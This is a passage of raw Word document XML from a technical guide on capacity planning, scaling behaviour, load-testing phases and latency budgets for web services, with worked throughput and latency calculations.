      <w:tr w:rsidR="001F1994" w:rsidRPr="001F1994" w14:paraId="42B68F0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2A434C" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>Latency-aware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6484CA" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>Routes to fastest backend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470C7A" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>Best latency, but may overload fast backends</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="70997F77" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:pict w14:anchorId="10A381FB">
          <v:rect id="_x0000_i5108" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BBBF177" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7. Capacity Planning Using Throughput and Latency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042B382D" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>7.1 Back-of-Envelope Calculation Framework</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0916D6F1" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 1: Estimate required throughput:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C407EB1" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61492D68" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>DAU: 10 million users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F5FD834" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Average actions per user per day: 50</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF63289" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Peak-to-average ratio: 3x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41FD7DF9" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Peak hours: 4 hours (concentrated usage)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D688E2" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994"/>
    <w:p w14:paraId="254E0E42" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Average RPS: 10M × 50 / 86400 ≈ 5,800 RPS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E85D0BE" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Peak RPS: 5,800 × 3 = 17,400 RPS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA5EFE7" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Design for: 2x peak headroom = 35,000 RPS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF13375" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 2: Estimate required latency:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="764FCE5E" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EACD532" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>User-facing API: p99 &lt; 200ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="777BD27A" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Internal service calls: p99 &lt; 50ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64468123" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Database queries: p99 &lt; 20ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FD50E6D" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 3: Calculate required resources:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B976F53" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B968337" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Using Little's Law: Concurrency = Throughput × Latency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0834BA70" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994"/>
    <w:p w14:paraId="69E10C10" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>API servers (20ms average latency per request):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7998B68C" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Concurrency needed = 35,000 × 0.020 = 700 concurrent requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A018E9" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  If each server handles 100 concurrent: 7 servers minimum</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E88CD2" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  With headroom: 10–14 servers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6F169A" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994"/>
    <w:p w14:paraId="76C2E245" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Database (if each query takes 5ms):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D6F571F" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  DB concurrency = 35,000 × 0.005 = 175 concurrent queries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="236E0306" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  PostgreSQL max useful connections: ~100 per node</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E76D0F3" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Need 2 primary nodes (sharded) + read replicas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F3AD6F7" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7.2 Scalability Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F558FA8" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Linear scaling:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2074F647" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4218B7E4" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>1 server: 10K RPS at 5ms latency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49538536" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>2 servers: 20K RPS at 5ms latency ← ideal linear</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242A4B3A" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>10 servers: 100K RPS at 5ms latency ← ideal linear</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0594A50C" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sub-linear scaling (coordination overhead):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="328C80F2" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="533B979C" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>1 server: 10K RPS at 5ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30341164" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>2 servers: 18K RPS at 6ms (not 20K — coordination cost)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="588BFB60" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>10 servers: 70K RPS at 8ms (not 100K — contention, network overhead)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D3767BF" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Degraded scaling (shared bottleneck):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2193C402" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD34E5A" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>1 server: 10K RPS at 5ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1171B36E" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>10 servers: 30K RPS at 15ms (bottleneck: single database, single lock, shared resource)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51FD498B" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Adding more servers doesn't help — bottleneck isn't the servers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CFB3761" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7.3 Load Testing — Finding Your Limits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C8874EE" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The standard load test pattern:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29FAAF7F" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112B573B" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Phase 1: Ramp up (gradually increase RPS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46BE3FD6" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Find: at what RPS does p99 latency start increasing?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA3C093" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  This is your sustainable throughput.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241F73FD" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994"/>
    <w:p w14:paraId="65B1674E" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:lastRenderedPageBreak/>
        <w:t>Phase 2: Soak test (sustain load for hours)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D51697" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Find: does latency creep up over time? (memory leak, connection leak, GC pressure)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D09757" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  This is your long-term capacity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4AC171" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994"/>
    <w:p w14:paraId="0DEBE7EB" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Phase 3: Spike test (sudden traffic burst)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E2CCA02" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Find: can the system handle 5x sudden spike? How quickly does it recover?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="074E8BF1" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  This is your burst capacity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B5B4E87" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994"/>
    <w:p w14:paraId="28E070CE" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Phase 4: Breakpoint test (increase until failure)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="455447B5" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Find: at what RPS does the system fail completely?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D4FBF6C" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  This is your absolute ceiling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="076F75D1" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Key metrics during load testing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A0795C3" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70093493" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>RPS:     [graph increasing over time]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C32EA55" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Latency: p50=5ms, p95=10ms, p99=20ms ← should stay flat until saturation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38548D54" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Errors:  0% ← should stay zero until overload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EBEB02D" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>CPU:     60% ← target max in production</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14796DF7" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Memory:  stable ← should not grow continuously</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117C5860" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Queue:   0 or bounded ← should not grow continuously</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A5724D4" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:pict w14:anchorId="6BBE2F61">
          <v:rect id="_x0000_i5109" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C2CBD92" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8. Real-World Latency and Throughput Budgets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B715ABD" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8.1 Latency Budgets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B2D030" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Example: E-commerce product page (target: 200ms total):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E99EE0" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3180BE42" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>DNS resolution:     0ms (cached)           Budget: 0ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="330FBD5F" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>TCP + TLS:          0ms (connection reuse)  Budget: 0ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE0C5B7" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:lastRenderedPageBreak/>
        <w:t>CDN edge:           5ms (static assets)     Budget: 5ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="330E0660" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>API Gateway:        2ms (routing + auth)    Budget: 5ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C176552" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Product service:    8ms (cache hit)         Budget: 15ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6896C976" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  └─ Redis lookup:  0.5ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BBBA96D" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  └─ Business logic: 7.5ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="695FBA93" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Recommendation service: 20ms (ML model)    Budget: 30ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18857C89" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Inventory service:  5ms (cache hit)         Budget: 10ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54075328" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Response serialization: 2ms                 Budget: 5ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380E18FF" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Network (server → client): 30ms            Budget: 50ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE1C4F5" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Client rendering: 80ms                      Budget: 100ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="634DA812" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>─────────────────────────────────────────────────────────</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="353595CD" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Total: ~152ms                               Budget: 200ms (48ms headroom)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C0BC73" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Headroom is critical</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:t> — without it, any minor degradation (GC pause, cache miss, network blip) violates the SLA.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="740A85F4" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:pPr>
        <w:rPr>
